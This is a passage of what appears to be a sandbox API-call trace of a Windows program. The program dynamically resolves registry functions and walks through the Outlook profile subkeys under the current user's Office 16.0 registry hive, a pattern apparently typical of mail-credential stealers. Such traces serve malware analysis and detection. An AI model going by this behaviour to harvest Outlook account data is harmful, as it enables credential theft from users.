0x7ffb28a6d0d0 [0186.958] GetProcessHeap () returned 0x560000 [0186.958] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.958] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0xc, lpName=0x231f6e0, cchName=0x400 | out: lpName="f35c115766b7c94cb080da6869ae8f9d") returned 0x0 [0186.958] lstrlenA (lpString="f35c115766b7c94cb080da6869ae8f9d") returned 32 [0186.958] GetProcessHeap () returned 0x560000 [0186.958] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613110 [0186.958] lstrcpyA (in: lpString1=0x613110, lpString2="f35c115766b7c94cb080da6869ae8f9d" | out: lpString1="f35c115766b7c94cb080da6869ae8f9d") returned="f35c115766b7c94cb080da6869ae8f9d" [0186.958] GetProcessHeap () returned 0x560000 [0186.958] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613080 [0186.958] GetProcessHeap () returned 0x560000 [0186.958] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613110 | out: hHeap=0x560000) returned 1 [0186.958] GetProcessHeap () returned 0x560000 [0186.958] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0186.958] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.958] GetProcessHeap () returned 0x560000 [0186.958] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.958] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0xd, lpName=0x231f6e0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x0 [0186.959] lstrlenA (lpString="f86ed2903a4a11cfb57e524153480001") returned 32 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613110 [0186.959] lstrcpyA (in: lpString1=0x613110, lpString2="f86ed2903a4a11cfb57e524153480001" | out: lpString1="f86ed2903a4a11cfb57e524153480001") returned="f86ed2903a4a11cfb57e524153480001" [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x130) returned 0x653c00 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613ad0 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6138c0 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613920 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6139e0 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613b00 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613710 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613650 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613800 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613a70 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x6139b0 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613c20 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613b60 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613890 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21) returned 0x613bf0 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613a10 | out: hHeap=0x560000) returned 1 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613bc0 | out: hHeap=0x560000) returned 1 [0186.959] GetProcessHeap () returned 0x560000 [0186.959] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613950 | out: hHeap=0x560000) returned 1 [0186.959] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613a40 | out: hHeap=0x560000) returned 1 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6138f0 | out: hHeap=0x560000) returned 1 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613b30 | out: hHeap=0x560000) returned 1 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613980 | out: hHeap=0x560000) returned 1 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613770 | out: hHeap=0x560000) returned 1 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613aa0 | out: hHeap=0x560000) returned 1 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x560000) returned 1 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6130b0 | out: hHeap=0x560000) returned 1 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6130e0 | out: hHeap=0x560000) returned 1 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613080 | out: hHeap=0x560000) returned 1 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6108e0 | out: hHeap=0x560000) returned 1 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613110 | out: hHeap=0x560000) returned 1 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0186.960] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.960] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0xe, lpName=0x231f6e0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x103 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0186.960] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.960] GetProcessHeap () returned 0x560000 [0186.960] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.961] RegCloseKey (hKey=0x1d0) returned 0x0 [0186.961] GetProcessHeap () returned 0x560000 [0186.961] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617130 [0186.961] lstrlenA (lpString="\\") returned 1 [0186.961] GetProcessHeap () returned 0x560000 [0186.961] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617180 [0186.961] lstrcpyA (in: lpString1=0x617180, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.961] GetProcessHeap () returned 0x560000 [0186.961] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616b90 [0186.961] GetProcessHeap () returned 0x560000 [0186.961] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0x71) returned 0x610840 [0186.961] GetProcessHeap () returned 0x560000 [0186.961] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616b90 [0186.961] GetProcessHeap () returned 0x560000 [0186.961] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0xb1) returned 0x61d1c0 [0186.961] GetProcessHeap () returned 0x560000 [0186.961] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.961] GetProcessHeap () returned 0x560000 [0186.961] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.961] GetProcessHeap () returned 0x560000 [0186.961] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.961] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.961] GetProcessHeap () returned 0x560000 [0186.961] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.961] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0186.961] GetProcessHeap () returned 0x560000 [0186.961] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.962] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.962] GetProcessHeap () returned 0x560000 [0186.962] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.962] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x103 [0186.962] GetProcessHeap () returned 0x560000 [0186.962] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.962] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.962] GetProcessHeap () returned 0x560000 [0186.962] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.962] RegCloseKey (hKey=0x1d0) returned 0x0 [0186.962] GetProcessHeap () returned 0x560000 [0186.962] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61d1c0 | out: hHeap=0x560000) returned 1 [0186.962] lstrlenA (lpString="\\") returned 1 [0186.962] GetProcessHeap () returned 0x560000 [0186.962] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171e0 [0186.962] lstrcpyA (in: lpString1=0x6171e0, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.962] GetProcessHeap () returned 0x560000 [0186.962] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616b90 [0186.962] GetProcessHeap () returned 0x560000 [0186.962] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0x71) returned 0x610840 [0186.962] GetProcessHeap () returned 0x560000 [0186.962] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616b90 [0186.962] GetProcessHeap () returned 0x560000 [0186.962] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0xb1) returned 0x61da00 [0186.962] GetProcessHeap () returned 0x560000 [0186.962] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.962] GetProcessHeap () returned 0x560000 [0186.962] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.962] GetProcessHeap () returned 0x560000 [0186.962] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.963] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.963] GetProcessHeap () returned 0x560000 [0186.963] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.963] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0186.963] GetProcessHeap () returned 0x560000 [0186.963] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.963] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.963] GetProcessHeap () returned 0x560000 [0186.963] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.963] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x103 [0186.963] GetProcessHeap () returned 0x560000 [0186.963] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.963] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.963] GetProcessHeap () returned 0x560000 [0186.963] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.963] RegCloseKey (hKey=0x1d0) returned 0x0 [0186.963] GetProcessHeap () returned 0x560000 [0186.963] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61da00 | out: hHeap=0x560000) returned 1 [0186.963] lstrlenA (lpString="\\") returned 1 [0186.963] GetProcessHeap () returned 0x560000 [0186.963] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617250 [0186.963] lstrcpyA (in: lpString1=0x617250, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.963] GetProcessHeap () returned 0x560000 [0186.963] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616c90 [0186.963] GetProcessHeap () returned 0x560000 [0186.963] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616c90, Size=0x71) returned 0x610840 [0186.963] GetProcessHeap () returned 0x560000 [0186.963] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616c90 [0186.963] GetProcessHeap () returned 0x560000 [0186.963] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616c90, Size=0xb1) returned 0x61db80 [0186.963] GetProcessHeap () returned 0x560000 [0186.963] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.964] GetProcessHeap () returned 0x560000 [0186.964] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.964] GetProcessHeap () returned 0x560000 [0186.964] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171e0 [0186.964] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.964] GetProcessHeap () returned 0x560000 [0186.964] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.964] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0186.964] GetProcessHeap () returned 0x560000 [0186.964] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.964] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.964] GetProcessHeap () returned 0x560000 [0186.964] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.964] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x103 [0186.964] GetProcessHeap () returned 0x560000 [0186.964] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617210 [0186.964] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.964] GetProcessHeap () returned 0x560000 [0186.964] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.964] RegCloseKey (hKey=0x1d0) returned 0x0 [0186.965] GetProcessHeap () returned 0x560000 [0186.965] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61db80 | out: hHeap=0x560000) returned 1 [0186.965] lstrlenA (lpString="\\") returned 1 [0186.965] GetProcessHeap () returned 0x560000 [0186.965] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617210 [0186.965] lstrcpyA (in: lpString1=0x617210, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.965] GetProcessHeap () returned 0x560000 [0186.965] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616b90 [0186.965] GetProcessHeap () returned 0x560000 [0186.965] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0x71) returned 0x610840 [0186.965] GetProcessHeap () returned 0x560000 [0186.965] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616c90 [0186.965] GetProcessHeap () returned 0x560000 [0186.965] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616c90, Size=0xb1) returned 0x61d040 [0186.965] GetProcessHeap () returned 0x560000 [0186.965] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.965] GetProcessHeap () returned 0x560000 [0186.965] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.965] GetProcessHeap () returned 0x560000 [0186.965] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.965] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.965] GetProcessHeap () returned 0x560000 [0186.965] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.965] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0186.965] GetProcessHeap () returned 0x560000 [0186.965] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.965] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.965] GetProcessHeap () returned 0x560000 [0186.965] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.966] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x103 [0186.966] GetProcessHeap () returned 0x560000 [0186.966] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171c0 [0186.966] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.966] GetProcessHeap () returned 0x560000 [0186.966] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.966] RegCloseKey (hKey=0x1d0) returned 0x0 [0186.966] GetProcessHeap () returned 0x560000 [0186.966] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61d040 | out: hHeap=0x560000) returned 1 [0186.966] lstrlenA (lpString="\\") returned 1 [0186.966] GetProcessHeap () returned 0x560000 [0186.966] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617150 [0186.966] lstrcpyA (in: lpString1=0x617150, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.966] GetProcessHeap () returned 0x560000 [0186.966] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616b90 [0186.966] GetProcessHeap () returned 0x560000 [0186.966] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0x71) returned 0x610840 [0186.966] GetProcessHeap () returned 0x560000 [0186.966] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616b90 [0186.966] GetProcessHeap () returned 0x560000 [0186.966] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0xb1) returned 0x61d580 [0186.966] GetProcessHeap () returned 0x560000 [0186.966] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.966] GetProcessHeap () returned 0x560000 [0186.966] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.966] GetProcessHeap () returned 0x560000 [0186.966] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617210 [0186.966] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.966] GetProcessHeap () returned 0x560000 [0186.966] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.967] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0186.967] GetProcessHeap () returned 0x560000 [0186.967] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.967] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.967] GetProcessHeap () returned 0x560000 [0186.967] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.967] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x103 [0186.967] GetProcessHeap () returned 0x560000 [0186.967] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.967] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.967] GetProcessHeap () returned 0x560000 [0186.967] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.967] RegCloseKey (hKey=0x1d0) returned 0x0 [0186.967] GetProcessHeap () returned 0x560000 [0186.967] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61d580 | out: hHeap=0x560000) returned 1 [0186.967] lstrlenA (lpString="\\") returned 1 [0186.967] GetProcessHeap () returned 0x560000 [0186.967] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617190 [0186.967] lstrcpyA (in: lpString1=0x617190, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.967] GetProcessHeap () returned 0x560000 [0186.967] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616b90 [0186.967] GetProcessHeap () returned 0x560000 [0186.967] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0x71) returned 0x610840 [0186.967] GetProcessHeap () returned 0x560000 [0186.967] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616b90 [0186.967] GetProcessHeap () returned 0x560000 [0186.967] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0xb1) returned 0x61d580 [0186.967] GetProcessHeap () returned 0x560000 [0186.967] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.967] GetProcessHeap () returned 0x560000 [0186.967] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.968] GetProcessHeap () returned 0x560000 [0186.968] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.968] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.968] GetProcessHeap () returned 0x560000 [0186.968] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.968] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0186.968] GetProcessHeap () returned 0x560000 [0186.968] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617210 [0186.968] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0186.968] GetProcessHeap () returned 0x560000 [0186.968] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.968] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x103 [0186.968] GetProcessHeap () returned 0x560000 [0186.968] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.968] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.968] GetProcessHeap () returned 0x560000 [0186.968] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.968] RegCloseKey (hKey=0x1d0) returned 0x0 [0186.968] GetProcessHeap () returned 0x560000 [0186.968] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61d580 | out: hHeap=0x560000) returned 1 [0186.968] lstrlenA (lpString="\\") returned 1 [0186.968] GetProcessHeap () returned 0x560000 [0186.968] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617210 [0186.968] lstrcpyA (in: lpString1=0x617210, lpString2="\\" | out: lpString1="\\") returned="\\" [0186.968] GetProcessHeap () returned 0x560000 [0186.968] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616b90 [0186.968] GetProcessHeap () returned 0x560000 [0186.968] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0x71) returned 0x610840 [0186.969] GetProcessHeap () returned 0x560000 [0186.969] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616b90 [0186.969] GetProcessHeap () returned 0x560000 [0186.969] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0xb1) returned 0x61d040 [0186.969] GetProcessHeap () returned 0x560000 [0186.969] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.969] GetProcessHeap () returned 0x560000 [0186.969] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.969] GetProcessHeap () returned 0x560000 [0186.969] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.969] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.969] GetProcessHeap () returned 0x560000 [0186.969] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.969] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", phkResult=0x231f578 | 